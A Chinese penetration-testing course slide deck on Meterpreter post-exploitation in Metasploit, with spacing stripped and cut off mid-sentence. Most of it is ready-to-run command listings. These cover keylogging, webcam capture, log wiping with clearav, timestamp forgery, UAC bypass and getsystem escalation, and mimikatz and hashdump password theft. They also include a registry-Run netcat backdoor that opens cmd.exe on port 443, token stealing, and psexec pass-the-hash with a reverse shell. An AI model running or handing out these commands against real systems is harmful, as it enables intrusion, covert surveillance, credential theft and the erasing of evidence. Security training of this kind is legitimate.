渗透测试技术 课件 第6章-6.2-Meterpreter

MeterpreterMeterpreter是Metasploit框架中的一个扩展模块，作为溢出成功以后的攻击载荷使用，攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpretershell的链接。Meterpretershell作为渗透模块有很多有用的功能，比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。前言Meterpreter常用命令Metasploit后渗透测试模块sessions#sessions–h查看帮助sessions-i<ID值>#进入会话-k杀死会话background#将当前会话放置后台run#执行已有的模块，输入run后按两下tab，列出已有的脚本info#查看已有模块信息getuid#查看权限getpid#获取当前进程的pidsysinfo#查看目标机系统信息ps#查看当前活跃进程kill<PID值>杀死进程idletime#查看目标机闲置时间reboot/shutdown#重启/关机shell#进入目标机cmdshell系统基本命令uictl开关键盘/鼠标：uictl[enable/disable][keyboard/mouse/all]#开启或禁止键盘/鼠标uictldisablemouse#禁用鼠标uictldisablekeyboard#禁用键盘系统基本命令webcam摄像头命令：webcam_list#查看摄像头webcam_snap#通过摄像头拍照webcam_stream#通过摄像头开启视频系统基本命令execute执行文件：execute#在目标机中执行文件execute-H-i-fcmd.exe#创建新进程cmd.exe，-H不可见，-i交互系统基本命令migrate进程迁移：getpid#获取当前进程的pidps#查看当前活跃进程migrate<pid值>#将Meterpreter会话移植到指定pid值进程中kill<pid值>#杀死进程系统基本命令clearav清除日志：clearav#清除windows中的应用程序日志、系统日志、安全日志系统基本命令getwd或者pwd#查看当前工作目录ls#列出当前目录下文件cd#进入目录search-f*pass*#搜索文件-h查看帮助catc:\\lltest\\lltestpasswd.txt#查看文件内容upload/tmp/hack.txtC:\\lltest#上传文件到目标机上downloadc:\\lltest\\lltestpasswd.txt/tmp/#下载文件到本机上editc:\\1.txt#编辑或创建文件没有的话，会新建文件rmC:\\lltest\\hack.txtmkdirlltest2#只能在当前目录下创建文件夹rmdirlltest2#只能删除当前目录下文件夹getlwd或者lpwd#操作攻击者主机查看当前目录lcd/tmp#操作攻击者主机切换目录基本文件系统命令timestomp伪造时间戳：timestompC://-h#查看帮助timestomp-vC://2.txt#查看时间戳timestompC://2.txt-fC://1.txt#将1.txt的时间戳复制给2.txt文件系统命令ipconfig/ifconfignetstat–anoarpgetproxy#查看代理信息route#查看路由基本网络命令portfwd端口转发：用法：portfwd[-h][add|delete|list|flush][args]选项：

-L<opt>要监听的本地主机（可选）

-h帮助横幅

-l<opt>要监听的本地端口

-p<opt>连接到的远程端口

-r<opt>要连接到的远程主机portfwdadd-l4444-p3389-r02#端口转发,本机监听4444,把目标机3389转到本机4444rdesktop-uAdministrator-p123.com:4444#使用rdesktop来连接桌面，-u用户名-p密码rdesktop:4444#需要输入用户名和密码远程连接基本网络命令autoroute添加路由:runautoroute–h#查看帮助runautoroute-s/24#添加到目标环境网络runautoroute–p#查看添加的路由基本网络命令Socks4a代理:autoroute添加完路由后，还可以利用msf自带的sock4a模块进行Socks4a代理autoroute添加完路由后，还可以利用msf自带的sock4a模块进行Socks4a代理msf>useauxiliary/server/socks4amsf>setsrvhostmsf>setsrvport1080msf>run基本网络命令proxychains代理访问：vi/etc/proxychains.conf#添加socks41080最后proxychains使用Socks4a代理访问基本网络命令Meterpreter常用命令Metasploit后渗透测试模块信息收集的脚本位于：/usr/share/metasploit-framework/modules/post/windows/gather/usr/share/metasploit-framework/modules/post/linux/gather信息收集runpost/windows/gather/checkvm#是否虚拟机runpost/linux/gather/checkvm#是否虚拟机runpost/windows/gather/forensics/enum_drives#查看分区runpost/windows/gather/enum_applications#获取安装软件信息runpost/windows/gather/dumplinks#获取最近的文件操作runpost/windows/gather/enum_ie#获取IE缓存runpost/windows/gather/enum_chrome#获取Chrome缓存runpost/windows/gather/enum_patches#补丁信息runpost/windows/gather/enum_domain#查找域控常用信息收集脚本getsystem提权：命令：getsystemgetsystem工作原理：①getsystem创建一个新的Windows服务，设置为SYSTEM运行，当它启动时连接到一个命名管道。②getsystem产生一个进程，它创建一个命名管道并等待来自该服务的连接。③Windows服务已启动，导致与命名管道建立连接。④该进程接收连接并调用ImpersonateNamedPipeClient，从而为SYSTEM用户创建模拟令牌。然后用新收集的SYSTEM模拟令牌产生cmd.exe，并且我们有一个SYSTEM特权进程。提权bypassuac:内置多个pypassuac脚本，原理有所不同，使用方法类似，运行后返回一个新的会话，需要再次执行getsystem获取系统权限，如：useexploit/windows/local/bypassuacuseexploit/windows/local/bypassuac_injectionusewindows/local/bypassuac_vbsusewindows/local/ask提权bypassuac.rb脚本使用：msf>useexploit/windows/local/bypassuacmsf>setSESSION1msf>run提权可先利用enum_patches模块收集补丁信息，然后查找可用的exploits进行提权meterpreter>runpost/windows/gather/enum_patches#查看补丁信息msf>useexploit/windows/local/ms13_053_schlampereimsf>setSESSION1msf>exploit内核漏洞提权loadmimikatz#helpmimikatz查看帮助（msf6中mimikat已被kiwi集成，可以loadkiwi加载）wdigest#获取Wdigest密码mimikatz_command-fsamdump::hashes#执行mimikatz原始命令mimikatz_command-fsekurlsa::searchPasswordsmimikatz抓取密码enumdesktops#查看可用的桌面getdesktop#获取当前meterpreter关联的桌面set_desktop#设置meterpreter关联的桌面-h查看帮助screenshot#截屏useespia#或者使用espia模块截屏然后输入screengrabrunvnc#使用vnc远程桌面连接远程桌面&截屏1.getgui命令：rungetgui–h#查看帮助rungetgui-e#开启远程桌面rungetgui-ulltest2-p123456#添加用户rungetgui-f6661–e#3389端口转发到6661getgui系统不推荐，推荐使用runpost/windows/manage/enable_rdpgetgui添加用户时，有时虽然可以成功添加用户，但是没有权限通过远程桌面登陆开启rdp&添加用户2.enable_rdp脚本：runpost/windows/manage/enable_rdp#开启远程桌面runpost/windows/manage/enable_rdpUSERNAME=www2PASSWORD=123456#添加用户runpost/windows/manage/enable_rdpFORWARD=trueLPORT=6662#将3389端口转发到6662脚本位于/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb通过enable_rdp.rb脚本可知：开启rdp是通过reg修改注册表；添加用户是调用cmd.exe通过netuser添加；端口转发是利用的portfwd命令开启rdp&添加用户keyscan_start#开始键盘记录keyscan_dump#导出记录数据keyscan_stop#结束键盘记录键盘记录usesniffersniffer_interfaces#查看网卡sniffer_start2#选择网卡开始抓包sniffer_stats2#查看状态sniffer_dump2/tmp/lltest.pcap#导出pcap数据包sniffer_stop2#停止抓包sniffer抓包注册表基本命令：reg–h-d注册表中值的数据.-k注册表键路径-v注册表键名称

enumkey枚举可获得的键setval设置键值queryval查询键值数据注册表操作注册表设置nc后门：upload/usr/share/windows-binaries/nc.exeC:\\windows\\system32#上传ncregenumkey-kHKLM\\software\\microsoft\\windows\\currentversion\\run#枚举run下的keyregsetval-kHKLM\\software\\microsoft\\windows\\currentversion\\run-vlltest_nc-d'C:\windows\system32\nc.exe-Ldp443-ecmd.exe'#设置键值regqueryval-kHKLM\\software\\microsoft\\windows\\currentversion\\Run-vlltest_nc#查看键值nc-v44443#攻击者连接nc后门注册表操作incognito假冒令牌：useincognito#helpincognito查看帮助list_tokens-u#查看可用的tokenimpersonate_token'NTAUTHORITY\SYSTEM'#假冒SYSTEMtoken或者impersonate_tokenNT\AUTHORITY\\SYSTEM#不加单引号需使用\\execute-fcmd.exe-i–t#-t使用假冒的token执行或者直接shellrev2self#返回原始token令牌操作steal_token窃取令牌：steal_token<pid值>#从指定进程中窃取token先psdrop_token#删除窃取的token令牌操作获取哈希：runpost/windows/gather/smart_hashdump#从SAM导出密码哈希#需要SYSTEM权限哈希利用PSExec哈希传递：通过smart_hashdump获取用户哈希后，可以利用psexec模块进行哈希传递攻击前提条件：①开启445端口smb服务；②开启admin$共享msf>useexploit/windows/smb/psexecmsf>setpayloadwindows/meterpreter/reverse_tcpmsf>setLHOST34msf>setLPORT443msf>setRHOST44msf>setSMBUserAdministratormsf>setSMBPassaad3b4*****04ee:5b5f00*****c424cmsf>setSMBDomainWORKGROUP#域用户需要设置SMBDomainmsf>exploit哈希利用metasploit自带的后门有两种方式启动的，一种是通过启动项启动(persistence)，一种是通过服务启动(metsvc)，另外还可以通过persistence_exe自定义后门文件。1.persistence启动项后门：在C:\Users***\AppData\Local\Temp\目录下，上传一个vbs脚本在注册表HKLM\S